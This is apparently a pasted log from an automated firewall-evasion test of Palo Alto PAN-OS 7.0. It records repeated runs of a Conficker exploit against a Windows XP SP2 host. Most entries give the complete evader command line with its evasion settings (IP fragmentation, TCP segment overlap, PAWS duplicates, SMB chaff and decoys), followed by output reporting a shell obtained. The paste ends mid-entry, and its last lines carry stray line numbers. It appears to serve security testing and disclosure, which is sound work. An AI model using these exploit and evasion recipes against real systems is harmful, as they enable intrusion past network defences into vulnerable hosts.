netsecvulns

Palo Alto Networks PAN-OS 7.0 evader log file

Jun 8th, 2015
SECURITY BREACHES: 423 | DURATION: 43229 SEC

Info: Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
2015-06-07 23:19:27 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
2015-06-07 23:19:27 INFO Victim check disabled - will NOT notice if victim is no longer running
2015-06-07 23:19:29 INFO Using rand seed Wcn7q/xCpWQ=
2015-06-07 23:19:29 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
2015-06-07 23:19:29 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
..
2 runs averaging 1.63 runs / second ; progress: 1/43200...................2015-06-07 23:19:33 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62021 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=P2RHsq/Wcjc --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"24" --evasion=[msrpc_req,end]tcp_paws,"1","268435453","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed P2RHsq/Wcjc
The following evasions are applied from stage msrpc_bind to msrpc_req:
- IPv4 fragments with at most 24 bytes per fragment
The following evasions are applied from stage msrpc_req to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.111:62021 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
...............2015-06-07 23:19:36 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51525 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ElGy0J/TZpw --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1479","new","zero" --verifydelay=1000 --payload=shell
Info: Using random seed ElGy0J/TZpw
The following evasions are applied from stage smb_opentree to msrpc_req:
- Before normal SMB writes, 7 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.117:51525 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..
40 runs averaging 6.31 runs / second ; progress: 6/43200..............................
70 runs averaging 6.13 runs / second ; progress: 11/43200.........................
95 runs averaging 5.76 runs / second ; progress: 16/43200.........................
120 runs averaging 5.57 runs / second ; progress: 22/43200.....2015-06-07 23:19:52 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13515 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IR1Yko0dPgg --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"3","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,end]tcp_paws,"1","117616708","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
Info: Using random seed IR1Yko0dPgg
The following evasions are applied from stage smb_connect to smb_opentree:
- TCP timestamps echo reply value is sent in the wrong endianness
The following evasions are applied from stage smb_opentree to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117616708> and has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to smb_openpipe:
- Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.

Info: NetBIOS connection 10.62.90.118:13515 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.............2015-06-07 23:19:54 INFO
Success. (10.62.90.110):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58996 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=dJz7n8sKZ9A --evasion=[smb_opentree,end]tcp_chaff,"75%","nullchksum|nullflag|outofwindow","random" --evasion=[smb_connect,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed dJz7n8sKZ9B
The following evasions are applied from stage netbios_connect to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_connect to end:
- TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
The following evasions are applied from stage smb_opentree to end:
- 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* NULL TCP checksum.
* NULL TCP control flags.
* An out-of-window sequence number.
* Duplicate packet has random bytes as payload

Info: NetBIOS connection 10.62.90.110:58996 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
........2015-06-07 23:19:55 INFO
Success. (10.62.90.110):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53735 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Q1Ry+56Ny4g --evasion=[smb_opentree,end]smb_decoytrees,"5","6","7","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"3","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"75%","nullchksum|nullflag|outofwindow|shorthdr","shuffle" --verifydelay=1000 --payload=shell
Info: Using random seed Q1Ry+56Ny4h
The following evasions are applied from stage smb_connect to msrpc_bind:
- 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
The following evasions are applied from stage smb_opentree to msrpc_bind:
- 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* NULL TCP checksum.
* NULL TCP control flags.
* An out-of-window sequence number.
* TCP header shorter than 20 bytes
* Duplicate packet has shuffled original payload
The following evasions are applied from stage smb_opentree to end:
- Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.

Info: NetBIOS connection 10.62.90.110:53735 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
......
155 runs averaging 5.83 runs / second ; progress: 27/43200.................2015-06-07 23:19:59 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24638 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Ufs+GHrFFUA --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"32" --evasion=[smb_opentree,msrpc_req]ipv4_order,"firstlast" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","5","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed Ufs+GHrFFUB
The following evasions are applied from stage netbios_connect to msrpc_bind:
- IPv4 fragments with at most 32 bytes per fragment
The following evasions are applied from stage smb_connect to msrpc_req:
- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- IPv4 fragments are sent in correct order except that the first fragment comes last

Info: NetBIOS connection 10.62.90.114:24638 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...2015-06-07 23:20:00 INFO
Success. (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13965 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UB07gamyjBM --evasion=[smb_connect,end]tcp_paws,"50%","215801129","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","190724998","random" --verifydelay=1000 --payload=shell
Info: Using random seed UB07gamyjBN
The following evasions are applied from stage smb_connect to end:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215801129> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_opentree to smb_openpipe:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190724998> and has random bytes as payload

Info: NetBIOS connection 10.62.90.113:13965 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
........
185 runs averaging 5.83 runs / second ; progress: 32/43200...2015-06-07 23:20:03 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26112 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=MkfDE4ODgEw --evasion=[msrpc_req,end]smb_chaff,"2","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed MkfDE4ODgEw
The following evasions are applied from stage smb_opentree to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage msrpc_req to end:
- Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload

Info: NetBIOS connection 10.62.90.117:26112 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
..................
207 runs averaging 5.63 runs / second ; progress: 37/43200...............
222 runs averaging 5.31 runs / second ; progress: 42/43200...........
233 runs averaging 4.98 runs / second ; progress: 47/43200............
245 runs averaging 4.73 runs / second ; progress: 52/43200.............
258 runs averaging 4.54 runs / second ; progress: 57/43200..............
272 runs averaging 4.39 runs / second ; progress: 62/43200................
288 runs averaging 4.30 runs / second ; progress: 67/43200.....................
309 runs averaging 4.30 runs / second ; progress: 72/43200..............
323 runs averaging 4.20 runs / second ; progress: 77/43200.....
328 runs averaging 4.00 runs / second ; progress: 82/43200......
334 runs averaging 3.84 runs / second ; progress: 87/43200.......2015-06-07 23:21:01 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21232 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=AjLLEsF6RyU --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"349","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"21","chksum|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed AjLLEsF6RyU
The following evasions are applied from stage smb_opentree to msrpc_req:
- With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* TCP header shorter than 20 bytes
* Duplicate packet has original payload with alphanumeric bytes randomized
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 349 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.

Info: NetBIOS connection 10.62.90.112:21232 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
...
345 runs averaging 3.75 runs / second ; progress: 92/43200................
361 runs averaging 3.72 runs / second ; progress: 97/43200......2015-06-07 23:21:09 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22183 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=gueqfnfgtKk --evasion=tcp_nocwnd --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed gueqfnfgtKm
- TCP congestion window is not used.
The following evasions are applied from stage smb_openpipe to end:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.118:22183 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
379 runs averaging 3.71 runs / second ; progress: 102/43200.........
388 runs averaging 3.62 runs / second ; progress: 107/43200......
394 runs averaging 3.51 runs / second ; progress: 112/43200.......2015-06-07 23:21:27 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10588 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=WTkrkazPR60 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","111364770","alphanumrandomized" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
Info: Using random seed WTkrkazPR61
The following evasions are applied from stage netbios_connect to end:
- TCP receive window is set to at most 1048575 bytes.
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 111364770> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.118:10588 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
403 runs averaging 3.44 runs / second ; progress: 117/43200...............
418 runs averaging 3.42 runs / second ; progress: 122/43200.........2015-06-07 23:21:36 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43982 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=00v8sOxbBJs --evasion=[smb_opentree,msrpc_req]ipv4_frag,"16" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","7","random_msrpcbind" --verifydelay=1000 --payload=shell
Info: Using random seed 00v8sOxbBJv
The following evasions are applied from stage smb_opentree to msrpc_req:
- IPv4 fragments with at most 16 bytes per fragment
- Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.

Info: NetBIOS connection 10.62.90.112:43982 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...
431 runs averaging 3.38 runs / second ; progress: 127/43200...........
442 runs averaging 3.34 runs / second ; progress: 132/43200...........
453 runs averaging 3.30 runs / second ; progress: 137/43200.......
460 runs averaging 3.23 runs / second ; progress: 142/43200........
468 runs averaging 3.17 runs / second ; progress: 147/43200..
470 runs averaging 3.08 runs / second ; progress: 152/43200.....
475 runs averaging 3.02 runs / second ; progress: 157/43200..2015-06-07 23:22:09 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FcbWMtZoa2Y --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"439","random" --evasion=[smb_openpipe,end]tcp_paws,"25%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed FcbWMtZoa2Y
The following evasions are applied from stage smb_connect to smb_opentree:
- 439 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
The following evasions are applied from stage smb_openpipe to end:
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.117:19364 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
479 runs averaging 2.95 runs / second ; progress: 162/43200...
482 runs averaging 2.88 runs / second ; progress: 167/43200
482 runs averaging 2.79 runs / second ; progress: 172/43200............
494 runs averaging 2.78 runs / second ; progress: 177/43200.....................
515 runs averaging 2.82 runs / second ; progress: 182/43200.........
524 runs averaging 2.79 runs / second ; progress: 188/43200.....
529 runs averaging 2.75 runs / second ; progress: 193/43200
529 runs averaging 2.68 runs / second ; progress: 198/43200.......2015-06-07 23:22:50 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61516 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=s09eyA+Hq5o --evasion=[smb_opentree,end]tcp_paws,"13","8","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"1","9","zero" --verifydelay=1000 --payload=shell
Info: Using random seed s09eyA+Hq5q
The following evasions are applied from stage smb_opentree to end:
- Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_openpipe to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.117:61516 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
......
543 runs averaging 2.68 runs / second ; progress: 203/43200..2015-06-07 23:22:53 INFO
Success. (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32101 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=7vh9Q4gm0XQ --evasion=[smb_connect,end]ipv4_opt,"8","inc","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","14791099","zero" --verifydelay=1000 --payload=shell
Info: Using random seed 7vh9Q4gm0XT
The following evasions are applied from stage smb_connect to end:
- Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload except that alphanumeric characters are randomized
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14791099> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.113:32101 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
............
558 runs averaging 2.69 runs / second ; progress: 208/43200.......
565 runs averaging 2.66 runs / second ; progress: 213/43200......
571 runs averaging 2.62 runs / second ; progress: 218/43200....
575 runs averaging 2.58 runs / second ; progress: 223/43200.......2015-06-07 23:23:16 INFO
Success. (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29396 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=lVpgbd+BmFc --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","zero" --evasion=[smb_connect,end]tcp_paws,"1","268435455","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"269717" --verifydelay=1000 --payload=shell
Info: Using random seed lVpgbd+BmFe
The following evasions are applied from stage netbios_connect to end:
- TCP receive window is set to at most 269717 bytes.
The following evasions are applied from stage smb_connect to msrpc_req:
- Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has NULL bytes for payload
The following evasions are applied from stage smb_connect to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload

Info: NetBIOS connection 10.62.90.113:29396 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
......
589 runs averaging 2.59 runs / second ; progress: 228/43200...................
608 runs averaging 2.61 runs / second ; progress: 233/43200.....
613 runs averaging 2.58 runs / second ; progress: 238/43200...
616 runs averaging 2.54 runs / second ; progress: 243/43200..
618 runs averaging 2.49 runs / second ; progress: 248/43200..........
628 runs averaging 2.48 runs / second ; progress: 253/43200.......
635 runs averaging 2.46 runs / second ; progress: 258/432002015-06-07 23:23:48 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34169 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Deh5nhWGiuo --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"2","1","2047","random" --evasion=[netbios_connect,end]tcp_paws,"1","46504624","random_alphanum" --evasion=[netbios_connect,end]tcp_segvar,"3","20067" --verifydelay=1000 --payload=shell
Info: Using random seed Deh5nhWGiuo
The following evasions are applied from stage netbios_connect to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 46504624> and has random alphanumeric bytes as payload
- TCP packets are segmented to contain between 3 and 20067 bytes of payload.
The following evasions are applied from stage smb_opentree to msrpc_bind:
- Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2047 random bytes.

Info: NetBIOS connection 10.62.90.118:34169 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
2015-06-07 23:23:50 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49654 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=AgruJf0YDvE --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"1112" --evasion=[smb_connect,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed AgruJf0YDvE
The following evasions are applied from stage netbios_connect to msrpc_bind:
- IPv4 fragments with at most 1112 bytes per fragment
The following evasions are applied from stage smb_connect to msrpc_req:
- IPv4 fragments with at most 24 bytes per fragment
The following evasions are applied from stage smb_openpipe to end:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.118:49654 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..
639 runs averaging 2.43 runs / second ; progress: 263/43200..........
649 runs averaging 2.42 runs / second ; progress: 268/43200....
653 runs averaging 2.39 runs / second ; progress: 273/43200......
659 runs averaging 2.37 runs / second ; progress: 278/43200......
665 runs averaging 2.35 runs / second ; progress: 283/43200....
669 runs averaging 2.32 runs / second ; progress: 288/43200....
673 runs averaging 2.30 runs / second ; progress: 293/43200.......
680 runs averaging 2.28 runs / second ; progress: 298/43200.........Pid 27321 timed out - killed
2015-06-07 23:24:31 INFO
Timed out (10.62.90.119):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48251 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=FadBcaLVpzM --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1478","new","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
Info: Using random seed FadBcaLVpzM
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- Add a zero urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.119:48251 -> 10.35.1.207:445
Terminated
..
692 runs averaging 2.28 runs / second ; progress: 303/43200......
698 runs averaging 2.27 runs / second ; progress: 308/43200.......
705 runs averaging 2.25 runs / second ; progress: 313/43200....2015-06-07 23:24:47 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60901 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=5rcJEIzKfQ8 --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"10","new","random_alphanum" --evasion=[start,msrpc_req]tcp_paws,"50%","4","random_alphanum" --verifydelay=1000 --payload=shell
  401. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60901 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=5rcJEIzKfQ8 --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"10","new","random_alphanum" --evasion=[start,msrpc_req]tcp_paws,"50%","4","random_alphanum" --verifydelay=1000 --payload=shell
  402. Info: Using random seed 5rcJEIzKfQ/
  403. The following evasions are applied from stage start to msrpc_req:
  404. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alphanumeric bytes as payload
  405. The following evasions are applied from stage smb_connect to msrpc_bind:
  406. - TCP segments are set to overlap by 10 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  407. The following evasions are applied from stage smb_opentree to smb_openpipe:
  408. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  409.  
  410. Info: NetBIOS connection 10.62.90.119:60901 -> 10.35.1.207:445
  411. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  412. Info: Sending MSRPC request with exploit
  413. Info: Shell found, attack succeeded
  414. Info: Command shell connection reset.
